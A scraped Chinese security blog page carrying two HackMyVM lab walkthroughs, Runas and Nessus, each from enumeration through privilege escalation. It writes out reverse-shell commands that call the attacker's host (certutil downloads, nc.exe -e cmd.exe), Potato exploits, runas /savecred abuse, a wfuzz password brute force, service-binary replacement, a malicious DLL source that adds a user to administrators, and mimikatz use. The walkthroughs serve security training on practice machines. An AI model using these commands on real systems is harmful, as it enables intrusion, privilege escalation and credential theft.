:简单HackMyVm-DC02 :简单HackMyVm-DC01 :简单HackMyVm-TriplAdvisor :简单HackMyVm-Runas :简单HackMyVm-Always :简单HackMyVm-Nessus :简单HackMyVm-Liar :简单HackMyVm-Simple :简单HackMyVm-Simple :简单HackMyVm-Zero :简单HackMyVm-OMG :简单新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,Git提权,WordPress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,Windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月27日
1,485 阅读
0 评论
0 点赞
2025-10-27
HackMyVm-Runas :简单
8.1 信息打点首先进行全端口扫描端口详细信息探测时使用guest账户即可获取信息,说明 SMB 可能允许匿名访问或 guest 权限过高。可以使用SMBclient进行匿名登录试试,登录成功!但是没有任何东西ms17-010使用目录扫描、nothing8.2 文件包含利用来到首页点进来index.php发现需要我们传一个file参数,大概率就是文件包含了尝试包含index.php没有效果利用burp进行批量文件包含,字典网上随便找几个筛选内容可以看到这里有一段密文runas-b3a805b2594befb6c846d718d1224557yakuzza解密网站https://www.somd5.com/8.3 远程连接有了账号密码,登录口在哪?看了看之前的端口扫描结果是没有3389端口的,但是现在又有了。。。。。(中途换了换网,ip变成了10.10.10.168)可能是我疏忽了吧,快点来连,搞不好等一下又关了8.4 创建反向shellWindows下载马certutil.exe -urlcache -split -f http://10.10.10.137:8000/shell.exeMSF注意监听,同时执行Windows机器上的马MSFconsole use multi/handler set lhost 10.10.10.137 set payload Windows/meterpreter/reverse_tcp run8.5 MSF内核提权全部失败。。。8.6 WinPEAS提权在Windows中下载下来,并执行,发现一个最新的漏洞补丁没有打certutil.exe -urlcache -split -f http://10.10.10.137:8000/winPEAS.bat ./winPEAS.bat使用searchsploit检索exp在windwos中的VS打开,打包成exe放上去执行的时候没有任何回显,失败了8.7 土豆提权后面又试过好几种方法,土豆提权,提权失败certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET4.exe GodPotato-NET2.exe -cmd "cmd /c whoami" GodPotato-NET35.exe -cmd "cmd /c whoami" GodPotato-NET4.exe -cmd "cmd /c whoami"8.8 JuicyPotato提权烂土豆提权certutil.exe -urlcache -split -f http://10.10.10.137:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/CLSID/Windows_7_Enterprise/CLSID.list certutil.exe -urlcache -split -f http://10.10.10.137:8000/juicy-potato/Test/test_clsid.batJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\Windows\system32\cmd.exe -a "/c C:\Users\runas\nc.exe 10.10.10.137 4444 -e c:\Windows\system32\cmd.exe" -t *执行成功了,但是不能执行命令,提权失败8.9 runas提权在网上找到了这个,使用runas提权https://www.cnblogs.com/kqdssheng/p/18751119在上面这个图片中,可以看到本地管理员账户的凭据已存储在凭据管理器中,并且当前用户是runas!当前的 runas 用户能列出 RUNAS-PC\Administrator 的缓存凭据,具备利用这些凭据实现本地提权的条件Domain:interactive=RUNAS-PC\Administrator 是 “交互式登录的管理员凭据缓存”,意味着系统之前保存过 Administrator 的登录信息(比如用户曾用 Administrator 登录,或通过 runas /savecred 保存过凭据)。虽然无法直接看到明文密码,但 Windows 允许 “在缓存凭据存在时,以该用户身份执行程序”—— 这是提权的关键:8.10 两种具体提权方法使用下面的命令启动一个cmdrunas /savecred /user:RUNAS-PC\Administrator "cmd.exe"此时你执行完这条命令目标机器就会弹出一个cmd窗口,此时你执行命令的时候就是administrator超级管理员,那么我们是不是能够通过上面这条命令执行一个木马,或者nc,来反弹这个shell到kali上?来试试,提权成功!certutil.exe -urlcache -split -f http://10.10.10.137:8000/nc.exe # 从kali中下载nc runas /savecred /user:Administrator "C:\Users\runas\nc.exe 10.10.10.169 4444 -e cmd.exe"8.11 MSF内核扫描提升至系统权限可以使用winPACE.exe进行信息收集,在尝试过各种admin提权到系统权限的方式比如multi/recon/local_exploit_suggester MS17-017 exploit/Windows/local/ms16_075_reflection 烂土豆提权 土豆提权 多土豆汁提权等等MS16-032最终测试出来Windows/local/service_permissions 能够成功提权到system权限, Windows服务权限配置错误漏洞。8.13 抓取明文密码上传mimikatz,获取明文密码!!certutil.exe -urlcache -split -f http://10.10.10.169:8000/mimikatz.exe往期推荐全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细HackMyVm-DC04 :简单HackMyVm-DC03 :简单HackMyVm-DC02 :简单HackMyVm-DC01 :简单HackMyVm-TriplAdvisor :简单HackMyVm-Runas :简单HackMyVm-Always :简单HackMyVm-Nessus :简单HackMyVm-Liar :简单HackMyVm-Simple :简单HackMyVm-Simple :简单HackMyVm-Zero :简单HackMyVm-OMG :简单新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 Linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月27日
1,184 阅读
0 评论
0 点赞
2025-10-27
HackMyVm-Nessus :简单
6.1 端口扫描6.2 漏洞扫描nmap -sS -p 135,139,445,5985,8834 192.168.53.238 -T4 -A --script=vuln在访问这个端口的时候,提示你需要使用https访问那就使用https访问,没有账号密码,登录不进去6.3 查看SMB服务尝试免密连接SMB服务,可以正常连接,并且里面有两个PDF看看什么内容My Basic Network Scan_hwhm7q.pdfWeb Application Tests_f6jg9t.pdf发现作者信息,joseexiftool [pdf]6.4 爆破Nessus后台前面已经发现了,SMB是可以免密登录的,那么现在就只有nessus爆破了,来到nessus登录界面,抓包,添加爆破的payload根据这些数据包,使用wfuzz进行爆破因为要用到Kali中的rockyou.txt字典(也可以将rockyou.txt传到本机Windows进行爆破)wfuzz -c -z file,/usr/share/wordlists/rockyou.txt \ -X POST \ -H "Host: 192.168.53.238:8834" \ -H "X-Api-Token: 4c746180-a399-4abd-a9a0-49055fac236f" \ -H "Content-Type: application/json" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" \ -H "Origin: https://192.168.53.238:8834" \ -H "Referer: https://192.168.53.238:8834/" \ -d '{"username":"jose","password":"FUZZ"}' \ --hc 401,403 \ -f result.txt,raw \ https://192.168.53.238:8834/session得到密码,tequiero当前nessus版本为10.7.3,应该是比较新的,没有什么漏洞,或者漏洞没有公开(去网上搜了下,可能有一个本地提权漏洞,但是exp没有公开)6.5 盗取认证信息来到代理界面,尝试查看源码查看密码,查看失败那么就利用代理,发送数据包到Kali中,看看有没有密码出现,Kali记得开ncKali得到的信息,没有密码信息一个一个切换,当我切换到basic这个内容nc接收到的数据包如下,发现一段密文得到认证信息,解密后就是账号密码nesus:Z#JuXH$ph-;v@,X&mV)得到账号密码,和之前那个靶机一样,需要修改登录的密码,这个已经过期了nxc SMB 192.168.53.238 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'6.6 近源攻击!!按两次Esc键,来到选择账户界面修改你的账号密码修改密码为123456,登录SMB,发现什么也没有6.7 远程连接那就来到5985端口,执行命令成功!evil-winrm -i 192.168.53.238 -u nesus -p 1234566.8 反弹shell这里我尝试了各种MSF的木马,都被杀软给杀了,无意间使用nc的时候就不会被杀,使用nc进行反弹shell(Kali记得开监听)./nc.exe 192.168.53.51 1234 -e cmd6.9 提权6.9.1 local_exploit_suggester提权打开MSF(这一步其实很多余,这样子是扫不出来的,基本只有后渗透模块meterperter才能使用)MSFconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload(nc反弹的是基础shell,非meterpreter) # 目标是Windows,接收nc命令反弹的shell: set PAYLOAD Windows/shell_reverse_tcp set LHOST 192.168.53.51 # 攻击机IP(与nc反弹目标一致) set LPORT 1234 # 监听端口(与nc反弹端口一致) run -j # 启动监听,保持后台执行 use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块 set session 3 # 设置反弹成功的会话id为3,使用 sessions 即可查看所有的会话id6.9.2 PrivescCheck提权内网常见的提权和信息收集文章参考:https://www.cnblogs.com/Hekeats-L/p/16879325.html工具链接:https://github.com/itm4n/PrivescCheck/releases/tag/2025.10.06-1upload PrivescCheck.ps1 Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1 Invoke-PrivescCheck有一个高危的提权漏洞看看文件信息每一项描述如下(如果您精通Linux提权的话,将会和Linux进行类比)Name服务的 “内部名字”(操作服务时用,比如启停服务)nginx 服务的内部名就是 “nginx”(用systemctl restart nginx时的名字)后续想重启这个服务,要用到这个名字DisplayName服务的 “显示名字”(在 Windows 服务面板里看到的名字,方便你找到它)nginx 在 Linux 里的显示名可能是 “nginx - high performance web server”确认你改的是对的服务,别改错了User这个服务是用 “LocalSystem” 权限运行的(Windows 里的最高权限,比管理员还高)类比 Linux 里用 “root” 用户运行的 nginx 服务提权的关键!服务跑在最高权限,改了它的程序就能拿最高权限ImagePath服务启动时会执行的 “核心 exe 文件路径”(就是你要替换的那个文件)类比 Linux 里 nginx 守护进程的路径/usr/sbin/nginx目标文件!把这个 exe 换成恶意程序就行StartMode服务是 “自动启动” 的(开机或服务崩溃后会自己重启)类比 Linux 里systemctl enable nginx(开机自启)替换文件后不用手动触发,重启机器 / 服务就会执行恶意程序Type服务是 “独立进程”(启动时只跑这个 exe,不依赖其他程序)类比 Linux 里 nginx 是独立进程(`ps auxgrep nginx` 能看到单独的进程)RegistryKey/Path服务在 Windows 注册表中的配置路径(不用管,提权用不上)类比 Linux 里 nginx 的配置文件路径/etc/nginx/nginx.conf(但这里是注册表,不用管)次要信息,不用关注Status服务当前状态(空,因为前面警告没查到)类比 Linux 里systemctl status nginx报错,看不到 “active” 还是 “inactive”后续手动用命令查就行,不影响提权UserCanStart你当前用户 “不能手动启动这个服务”类比 Linux 里普通用户不能systemctl start nginx没关系,能重启机器或杀进程间接触发UserCanStop你当前用户 “不能手动停止这个服务”类比 Linux 里普通用户不能systemctl stop nginx没关系,用taskkill(类比 Linux 的 kill)杀进程就行ModifiablePath你能修改的文件路径 —— 就是上面说的那个要替换的 exe(nessus-service.exe)类比 Linux 里ls -l /usr/sbin/nginx显示你有 w 权限,能改这个文件明确告诉你 “要改哪个文件”IdentityReference拥有这个修改权限的用户 —— 就是你当前的 “NESSUS\nesus” 用户类比 Linux 里ls -l /usr/sbin/nginx显示 “ubuntu rwx”(你的用户有权限)确认 “是你自己有这个改文件的权限”Permissions你的权限是 “完全控制”(能改、能删、能替换这个 exe,想干嘛干嘛)类比 Linux 里的 “rwx” 权限,尤其是 “w”(写入)权限 总结一下:你当前的nesus用户,能完全控制一个叫Tenable Nessus的服务 —— 这个服务是用 Windows 最高权限(LocalSystem,类比 Linux root)运行的,启动时会执行nessus-service.exe。而且这个服务是开机自动启动的,你只要把nessus-service.exe换成恶意程序,下次服务启动(重启机器 / 杀进程),恶意程序就会用最高权限跑起来 —— 和你在 Linux 里替换 root 运行的/usr/sbin/nginx、重启后拿 root 权限,完全一样。cd "C:\Program Files\Tenable\Nessus\" dir原来是可以利用直接替换这个应用程序进行提权,但是这里,杀软会查杀掉我们的MSF马,要么你有能力过这个Windows defender当然也可以使用nc,但是nc是一个应用程序,需要选用参数,而不是直接执行,就能上线MSF或者Kali的nc的,需要使用批处理也就是.bat# Kali echo "C:\Users\nesus\Documents\nc.exe 192.168.53.51 4444 -e cmd.exe" > nessus-service.bat # evil-winrm upload nessus-service.bat "C:\Program Files\Tenable\Nessus\nessus-service.exe"这里漏掉了一个关键(你需要杀死它的进程,让服务自动重启)我们使用Stop-Process强制重启服务的时候报了一个错误:拒绝访问(Access is denied)Stop-Process -Id (Get-Process -Name "nessus-service").Id -Force遇到 “Access denied” 是因为nessus-service进程以LocalSystem权限运行,低权限用户无法直接杀死。如何解决?尝试更底层的taskkill!taskkill是 Windows 原生的进程杀死命令,权限处理和Stop-Process不同,先试一次:taskkill /f /im nessus-service.exe照样也是拒绝访问。重启计算机也没用,那么就换一种方法,dll劫持!dll劫持!6.10 DLL劫持6.10.1 什么是 DLL 劫持?(类比 Linux)1. 基础定义DLL(Dynamic Link Library,动态链接库)是 Windows 里的 “共享代码文件”,类似 Linux 的.so文件(Shared Object)。很多程序(比如服务、软件)运行时会主动加载依赖的 DLL 文件(比如调用 DLL 里的函数)。DLL 劫持的本质是:攻击者替换 / 插入一个恶意 DLL 文件,让高权限运行的目标程序(比如 LocalSystem 权限的服务)“误加载” 我们的恶意 DLL,从而执行恶意代码(相当于 Linux 里用LD_PRELOAD强制 root 进程加载恶意.so文件)。2. 类比 Linux 场景你在 Linux 里想提权时,可能会用LD_PRELOAD=/tmp/malicious.so /usr/bin/root_program,强制 root 运行的root_program加载你的恶意.so文件,.so里的代码会以 root 权限执行。Windows DLL 劫持和这个逻辑完全一样:让 LocalSystem 权限的Tenable Nessus服务,加载你写的恶意legacy.dll,DLL 里的代码会以 LocalSystem 权限执行。6.10.2 DLL 劫持提权过程1、查权限icacls "C:\Program Files\Tenable\Nessus\*.dll" 是 Windows 中用来查看指定目录下所有dll文件 / 子目录权限的命令,作用类似 Linux 里的 ls -l /path/*.dll(查看某个目录下所有文件的权限详情)。icacls "C:\Program Files\Tenable\Nessus\*.dll"为什么要使用这条命令?确认你当前用户(nesus)对服务依赖的 DLL 文件(比如legacy.dll)有写入 / 替换权限。从之前的权限结果看,nesus对这些 DLL 有F(完全控制)权限 —— 相当于 Linux 里用ls -l /usr/lib/root_program_dep.so看到普通用户有w权限,满足 “能替换文件” 的前提。权限表,和linux差不多,这里多了个修改还有删除,linux中只有rwx符号权限说明对应操作F完全控制读取、写入、执行、删除、修改属性M修改写入、删除(需配合F)RX读取和执行查看内容、运行程序R只读查看内容W写入修改内容(需目录权限)D删除删除文件或子目录2、编写恶意 DLL 代码在网上找到一个脚本,这是一个基础的恶意 DLL,核心逻辑在DLLMain函数里:/* DLL hijacking example author: @cocomelonc */ #include BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // 程序加载DLL时触发(关键分支) system("cmd.exe /k net localgroup administrators nesus /add"); // 恶意命令:把nesus加入管理员组 break; case DLL_PROCESS_DETACH: // 其他分支(进程卸载、线程创建/销毁)暂不用管 break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; }关键解释:DLLMain是 DLL 的 “入口函数”,类似 Linux.so文件的_init函数 —— 目标程序(Nessus 服务)加载 DLL 时,会自动调用DLLMain,并触发DLL_PROCESS_ATTACH分支。恶意命令net localgroup administrators nesus /add:把nesus加入管理员组(这里是示例,实际可写反弹 shell 命令,拿到 LocalSystem 权限)。Linux 类比:写一个恶意.so文件,在_init函数里执行system("usermod -aG sudo ubuntu"),让 root 进程加载时把普通用户加入 sudo 组。3、编译恶意 DLL(生成 Windows 能识别的格式)在 Kali 里用mingw编译 C 代码,生成 Windows 可加载的 DLL 文件:# Kali x86_64-w64-mingw32-gcc exp.c -shared -o legacy.dllx86_64-w64-mingw32-gcc:Windows 交叉编译器(生成 64 位 Windows 程序,需和目标系统位数匹配);-shared:生成 “共享库”(即 DLL 文件,对应 Linux 的.so);-o legacy.dll:输出文件名为legacy.dll(必须和目标服务依赖的 DLL 同名,否则服务找不到)。4、备份原 DLL + 上传替换(避免服务崩溃 + 植入恶意文件)# evil-winrm cd "C:\Program Files\Tenable\Nessus" mv legacy.dll legacy_beifen.dll # 备份文件 upload legacy.dll # 上传你Kali编译的dll文件备份原 DLL:legacy.dll是 Nessus 服务的依赖文件,直接删除会导致服务崩溃,备份后可回滚(类似 Linux 里cp /usr/lib/libnginx_dep.so /tmp/);上传替换:让服务下次加载legacy.dll时,加载的是你的恶意 DLL(类似 Linux 里cp /tmp/malicious.so /usr/lib/libnginx_dep.so)。5、重启虚拟机(触发服务加载恶意 DLL)最后重启目标机,Nessus 服务会随系统开机启动 —— 启动时会自动加载依赖的legacy.dll(此时已被替换成恶意 DLL):服务以LocalSystem(Windows 最高权限,类比 Linux root)启动;加载恶意legacy.dll,触发DLLMain的DLL_PROCESS_ATTACH分支;执行net localgroup administrators nesus /add,把nesus加入管理员组(实际可改为反弹 shell 命令,拿到 SYSTEM 权限);重启后,nesus已拥有管理员权限,提权成功。6.10.3 DLL 劫持的核心利用条件和 Linux.so劫持的条件类似,DLL 劫持能成功,必须同时满足以下 4 个条件(你的场景全部满足):1. 目标程序(服务 / 软件)以高权限运行比如你的Tenable Nessus服务以LocalSystem权限运行(类比 Linux 里 root 运行的nginx)。若目标程序是普通用户权限,即使劫持成功,也只能拿到普通权限,无法提权。2. 你对目标程序加载的DLL 文件有写入 / 替换权限你的icacls结果显示,nesus对legacy.dll有F(完全控制)权限,能备份、删除、替换该 DLL(类比 Linux 里普通用户对/usr/lib/libnginx_dep.so有w权限)。若只有只读权限(RX),无法替换 DLL,劫持失败。3. 目标程序会主动加载该 DLL 文件legacy.dll是Tenable Nessus服务的 “依赖 DLL”—— 服务启动时必须加载它才能正常运行(类比 Linux 里nginx必须加载libnginx_dep.so)。若目标程序不加载该 DLL,即使替换了也没用(比如替换一个无关的 DLL 文件)。4. 恶意 DLL 能被目标程序成功加载恶意 DLL 的格式要正确(比如 32 位 / 64 位和目标程序匹配,你用x86_64编译对应 64 位系统);若目标程序需要 DLL 导出特定函数(比如LoadLibrary调用的函数),恶意 DLL 需包含这些导出函数(你的示例是基础DLLMain,满足简单加载需求)。类比 Linux 里恶意.so需符合 ELF 格式,否则无法被nginx加载。6.10.4 总结找到一个 “高权限运行、且依赖的 DLL 你能替换” 的程序(比如服务),用恶意 DLL 替换原 DLL,让高权限程序执行恶意代码,从而拿到高权限。往期推荐全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细HackMyVm-DC04 :简单HackMyVm-DC03 :简单HackMyVm-DC02 :简单HackMyVm-DC01 :简单HackMyVm-TriplAdvisor :简单HackMyVm-Runas :简单HackMyVm-Always :简单HackMyVm-Nessus :简单HackMyVm-Liar :简单HackMyVm-Simple :简单HackMyVm-Simple :简单HackMyVm-Zero :简单HackMyVm-OMG :简单新版BurpSuite v2025.6.3汉化版,附激活教程Fine!2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具,全方位的目录爆破集成MemProcFS,Vol2和Vol3的内存取证神器重大更新!FeatherScan v4.5 内网 linux 信息收集,提权一键梭哈神器x-WAF,一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具,一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令,信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备,microsocks,一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!一个永久的渗透知识库【OSCP】vulnerable_docker,三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备,microsocks,一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机(1-5)全系列教程,Try Harder!绝对干货!DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5,windows内网渗透,社工提权,多种域内横向移动思路红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学不用MSF?红日靶场4,从外网到域控,手工干永恒之蓝,教科书级渗透教学ATK&CK红日靶场二,Weblogic漏洞利用,域渗透攻略SQL注入中各种WAF的绕过方式,狗,盾,神,锁,宝利用MySQL特性,WAF绕过技巧SQL注入绕过某狗的WAF防火墙,这一篇就够了,6k文案超详细大型翻车现场,十种WAF绕过姿势,仅成功一种喜欢长文吗?1w字图文带你了解sqlmap,从0到1,WAF绕过,高级用法一文通透
2025年10月27日
1,100 阅读
0 评论
0 点赞
1
2
3
4
...
15